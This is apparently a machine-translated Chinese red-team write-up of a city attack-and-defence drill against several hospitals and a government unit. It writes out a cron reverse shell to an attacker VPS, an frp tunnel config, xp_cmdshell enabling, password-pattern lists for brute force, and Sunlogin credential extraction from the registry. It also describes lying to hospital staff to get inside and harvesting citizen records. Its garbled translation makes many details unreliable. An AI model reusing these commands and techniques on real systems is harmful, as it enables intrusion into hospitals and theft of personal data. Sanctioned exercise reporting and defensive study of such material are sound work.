Title: Remember an interesting city offensive and defense drill experience

0x00 Write a word at the beginning

This time the offensive and defensive attack was quite interesting. At the beginning, the computer was very annoyed. In the end, if there was no computer, he could only use the computer sold to output it wildly.

After a while, our private target was eliminated. This time, there were still some problems with the rules and the system to each team, not according to the target unit. Others assigned some of our private targets to some basic and data points and then they were eliminated. Then they only scored 100 path points. Old 6 stared at our private targets. There was a hole in the office that we didn't have, and we wore it as soon as the target was released. It was blamed for being too naughty.

The ranking was ideal, and the final ranking was third. It was okay to be ranked in the top three with two technical brothers without back-end support. The first two heavyweights didn't have the championship. One submitted 0day and the other famous back-end support. In the end, the scores of the top two were more than half higher than ours.

After talking nonsense, let’s start our content. Don’t blame the strict code masters. At the end of the article, the masters are welcome to leave comments to communicate.

0x01 Target

A hospital's weak password for external network

The first day I divided the private target and the public target. This target is a public pool target. Fortunately, a weak password on the external network is directly in. The main thing is to know the IP address. There is no technical content when breaking through to the intranet. The goal is to give an official website address. It is estimated that the masters of other teams have gone to the official website IP on the cloud. Later, we also obtained all permissions through the password files on the dedicated shared server for the information science department.

Attack Path

Next, I will explain the intranet attack process according to the serial number marked on the picture above.

Path 1/Path 2 Weak password for external network

Here we talk about how this target IP came about. Collect C segment information through the IP address to find the h3c device. Log in to the default audit account password and go to the console to check the corresponding authorization information to confirm that it is the target IP address. However, the audit account does not have permission to configure the VPN tunnel, so I did a full-port scan and found a non-standard port ssh weak password. After getting the server permissions, I first did a rebound shell planning task.

crontab -eEdit plan tasks

bash -c 'exec bash -i /dev/tcp/you vps ip/you vps port 1'

I only went to fscan to scan after finishing the planned task and found that there were many weak ssh and mssql passwords in the intranet. I made several more ssh rebound shell planning tasks to prevent the action from falling too much in a while.

You can get a lot of weak passwords in the intranet. Create a frp to make it easier to go to the intranet to translate things in a while, and download the corresponding compiled version.

Project address: https://github.com/fatedier/frp

frp server

[common]

bind_port=8945

frp client

[common]

server_addr=you vps ip

server_port=8945

tls_enable=ture

pool_count=5

[plugin_socks]

type=tcp

remote_port=35145

plugin=socks5

#Certification Remove the following two lines without authentication

plugin_user=admin

plugin_passwd=Admin@123

use_encryption=true

use_compression=true

Execute on vps

./fprs -c frps.ini

Execute on the springboard machine

./fprc -c frpc.ini

After confirming that the connection is fine, nohup to the background. If you use VPS like Tencent Cloud or Alibaba, remember to open the corresponding port in the port group, otherwise the connection cannot be made, and the proxifier is sure to be available.

Path 3 Operation and maintenance machine

Here is an operation and maintenance terminal host that uses the mssql weak password scanned just now.

# Enable xp_cmdshell

EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp\_configure 'xp_cmdshell', 1;RECONFIGURE;

# Command execution

exec master.xp_cmdshell 'whoami'

Related Articles

https://www.cnblogs.com/websecyw/p/11016974.html

Make sure that the normal execution of the command is a system permission, download the certutil Trojan online, and after catching the password, make sure that the administrator does not go to the desktop remotely online.

Path 4 All permissions of the server

Only when you remotely go to the terminal did you know that this machine is an operation and maintenance machine. The SQL Server connection software is opened on the terminal, and the command above is used to enable xp_cmdshell to execute the command. Here, the SQL Server database has performed a downright operation, and the permission is the SQL Server service permission.

When I was on the horse, I always had problems. The permissions were too low. The Huofeng Enterprise Edition on it was turned on. The temp directory was not written in, so I only took the SQL Server permissions. After testing, I still couldn't turn off Huofeng. It should be that the SQL Server permissions were lower. Later, I found that the Huofeng console could distribute files and automatically execute Maozi, so I didn't care. This can be reproduced later and studied the environment.

Check the password saved by the browser. The Firefox browser saves the account password of the Turquoise console, as well as the account passwords of some other platforms. You can bump into the password after collecting the passwords.

Search for keywords in everything file, and carefully flip through the files of the server and terminal, maybe you will get unexpected results.

Password|Information Department|Asset Table|Topology|Account|Equipment|pass|user|config|Management|Planning

Advanced usage of ereryting (regular expression), you can also use content to search file content, and the search for file content is slower.

Ererything related articleshttps://www.jianshu.com/p/9c0ab75a264f

I found the device password information and topology information on the computer

All information about the device server

Basically, all network devices and server permissions are available. Here we sort out the password to bump the password. When sorting out the password, we found that this password is a regular password. We sort out the password rules and use social worker password generation scripts to generate some passwords.

Tool download address: https://github.com/cityofEmbera/CPassword

The tool is relatively simple to use. We only need to modify the name in username.txt. There are rules in dict.txt, and we can also make some changes, such as adding some rules in the password, as well as recent year information, such as:

@2013

@2014

@2015

@2016

@2017

@2018

@2019

@2020

@2021

@2022

#2013

#2014

#2015

#2016

#2017

#2018

#2019

#2020

#2021

#2022

123!@#

!@#123.

@233

!@#345

!@#qwe

python3 createDict.py will automatically generate a password file, and the password is saved in the createdict.txt file. After the password is generated, it will be thrown to kscan to specify the password file to collide with the password.

kscan.exe -t 10.0.0.0/8 --hydra --hydra-pass file:pwd.txt

Path 5 Turfur console file distribution

Here is the function of distributing files using the Turquoise console, and it is also automatically executed after the distribution of the Magic Ha file. Niu, Niu, Niu

I don’t know why my browser stuck when I open the console. I asked Master J to show me the file and directly distributed it.

All the machines installed with turquoise are online, and some intranet machines are not online. Here, if there is any problem with CS 4.3, you can choose to transfer the listener to generate the file.

After looking at a target machine, Wuhu scores are basically full. The points for servers, network equipment, terminals plus 40,000 data with citizenship information found in the recycling bin, and 6k of them have been obtained.

Path 6 Cloud Assets

Here I call an information sharing server. I bumped into the password and password I just collected. There are also weak passwords on the SQL Server above that can also execute commands, because there are too many weak passwords in the previous sa, and none of them will be called one by one. If you have passwords here, just use the tool to type them online.

I just flipped through the file and found that there was a special folder for information science on the E disk. I found out that I had obtained the assets on the cloud.

Path 7 Domain Name Permissions

Log in with the account password just now to obtain domain name resolution permissions

Cloud server permissions, one of which is the official website server, and it is the target of other teams.

Path 8 Cloud Server Permissions

Directly log in to Alibaba Cloud console and use c2 to generate powershell online

A comprehensive hospital

This goal is to open social workers and have close sources on the third night after the start.

Attack Path

Path 1 wifi password

Open Social Workers and Jinyuan immediately signed up that day. After dinner, I changed my work clothes and rushed to the hospital with my mobile phone. I used to browse kali nethunte on my mobile phone, and compiled some arm versions of tools. It was enough to build a foothold on the intranet.

After arriving at the scene, open the wifi master key to search for nearby wifi

Connect to wifi to confirm that you can access the target IP address, scan the QR code on WeChat to retrieve the password, and then bump the password on the intranet later.

The gateway address is found to be an exit device with h3c. If the weak password logs on the device, there is a network segment information to scan the corresponding network segment according to the network segment information.

Path 2 Sunflower rce

kscan specified wifi password file crashes into the passwords of fragile ports such as 3389, 22, and 1433, and gets an intranet machine and an external network machine.

There is a Sunflower Rce vulnerability in the external network machine. Whoami seems to have sunflower hung up afterwards (I don’t know what the problem is here, but the reason is not found). After executing the command afterwards, it will not be displayed.

Log in remotely with your password and find that Sunflower has been reconnecting and exiting and reopening is the same. After getting the horse on, just in case of installing a todesk for a while, you can remotely get it done.

Path 3 Target Machine

Through the external network springboard remote machine todesk, I directly scanned the internal network server network segment and bumped into the password to knock out a machine. I found that the server was installed with todesk and saved the todesk remote of three target machines. It was so happy.

Add the data on the terminal his system just now, and the 6k score is full

A specialized hospital

This hospital closed at night, and passed early the next morning. It was a bit embarrassing to enter the hospital and died of the community. At that time, I didn’t check what type of hospital this hospital was. There was no wifi at the door, so I could only go in. When I entered, the doctor at the door was still the guard at the door asked me what department I was in.

Men's degree? Gynecology?

I:

Then I looked at my neck with a little allergic reaction and said I was in a dermatology department?

Me: Yes Yes Yes Yes Dermatology

After entering, I searched for information about this hospital and I knocked on it. It seemed like a specialty hospital.

I went in and registered and waited there. There seemed to be no doctor in this hospital who specialized in dermatology. After registering, I waited for more than an hour. I turned on my phone and sat on wifi and started scanning the internal network.

Before the doctor could get a springboard machine and get on the horse, it was yo-yo. There was only one orphan machine in the intranet.

Attack Path

Path 1 wifi password

The same wifi master key goes in

Path 2 Target Machine

Scan the intranet here and found that an ms17010 is a win2012 machine. Try to execute msf directly on the mobile phone with a single command.

There is a 360 plus account on the machine that cannot be added. Certutil tried it and saw that there is no Sunflower process. Then we can directly read its configuration file and decrypt it directly to the machine.

Configuration file path

Installation version: C:\\Program Files\\Oray\\SunLogin\\SunloginClient\\config.ini

Portable version (green version): C:\\ProgramData\\Oray\\SunloginClient\\config.ini

I tried these two files

It should be a higher version. You can try to find it in the registry. I have read 360 and I hope I won't intercept it.

# Registry query

reg query HKEY\_USERS\\.DEFAULT\\Software\\Oray\\SunLogin\\SunloginClient\\SunloginInfo

reg query HKEY\_USERS\\.DEFAULT\\Software\\Oray\\SunLogin\\SunloginClient\\SunloginGreenInfo

Wuhu did not intercept it, just throw it into the tool to decrypt it

Sunflower decryption tool address: https://github.com/wafinfo/Sunflower_get_Password

The tool is simple to use. After git, install unicorn, then execute python3 to enter the encry_pwd field obtained in our registry just now, and enter it into the script according to the prompts.

Verify that you can connect, and Sunflower can directly get the host's permission remotely, and it's yo-yo.

A certain ZF unit

This unit has nothing to do. In the last few days, I went to ZF Street to lie on the corner of the wall. I took this into account a case. After getting the export equipment, I can build a VPN, and directly use l2TP to build a tunnel to enter the intranet. I tried my best to keep the top three positions.

Attack Path

There is no screenshot for this, you can read the article below, the key steps here.

Reference article:

https://zhiliao.h3c.com/questions/dispcont/146895

https://baijiahao.baidu.com/s?id=1716025203844234922amp;wfr=spideramp;for=pc

If the VPN cannot be built or the device does not have the VPN authorization, but it has Nat and telnet functions, if you have enough patience, you can also refer to the ideas of my previous article, use telnet to test the fragile ports of the intranet to map to the external network, write a script to batch test to improve efficiency, and you didn't have time to write it back from the last game.

Article address: https://forum.butian.net/share/1633

0x02 Summary

This time, I didn’t have much money to break through to the intranet. It was mainly because of the horizontal attack and defense of the intranet. When I was taking the target system in the first hospital, xp_cmdshell attacked the target machine from the operation and maintenance machine. The SQLServer database was depreciated and the temp directory could not be written. I couldn’t get the target system above. The file was distributed through the Turfur console. In fact, I had already obtained the Turfur console at the beginning. I was afraid that the impact would be too great if I didn’t use this function. I just used it later. I still had to learn how to use the SQLServer I know. I still had too few sqlserver usage postures and I had to learn. The latter were basically all social workers. I got the third place in the paddling. If the computer broke down, I used the sales computer and it took too much time to configure the environment.

Recently I also saw a good article about SQLServer sharing a wave. The community masters have many postures.

https://forum.butian.net/share/1390

Some things summarized by recent offensive and defensive operations, welcome to communicate with the masters

Some tips summary:

Check out the outside network

Asset collection ENScan_GO space drawing survey fofa/360quake/shadow/zoomeye/hunterkunyu/fofa_viewer/infoSearchAll lightweight scanner kscan service identification can be used to cooperate with fofa to quickly identify fscan c segments quickly identify subdomain corresponding IP C segments quickly scan subdomain information collection oneforall/subfinder/ksubdomain quickly filter real IP generation C segments Eeyesweb fingerprint recognition EHole is a good tool, you can add fingerprint and space drawing engine interface tide tidal fingerprint web online detection TideFingerhttpx Get web title status code Intranet host information collection

Everything file search (regular expression improves efficiency) Password saved by browser/WeChat/QQ folder/Recycle Bin/Shared disk/mail software/Corporate software Remote software Remote connection saved by remote software mstsc/Intranet connection/Sunflower/Todesk and other common intranet vulnerabilities such as Intranet

Sunflower rce (Sunflower is really cool) weblogics2redis shiro original address: https://forum.butian.net/share/1719